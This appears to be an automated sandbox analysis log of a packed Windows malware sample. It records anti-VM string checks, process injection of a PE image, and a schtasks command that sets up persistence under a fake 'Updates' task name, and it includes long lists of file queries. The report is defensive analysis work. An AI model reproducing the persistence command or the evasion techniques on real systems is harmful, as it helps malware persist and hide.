              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99656
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99546
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99437
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99323
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99218
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99109
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99000
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98890
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98725
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98604
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98484
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98296
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98186
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98053
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97893
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97735
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97594
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97454
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97297
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97151
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 96085
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 95901
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93632
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93516
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93344
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93203
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93089
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92977
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92875
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92766
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92656
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92547
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92437
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92328
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92219
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92109
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_06925D08 LdrInitializeThunk,11_2_06925D08
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csReference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csReference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csReference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/C1.csReference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/e2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeMemory written: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmpJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmpJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
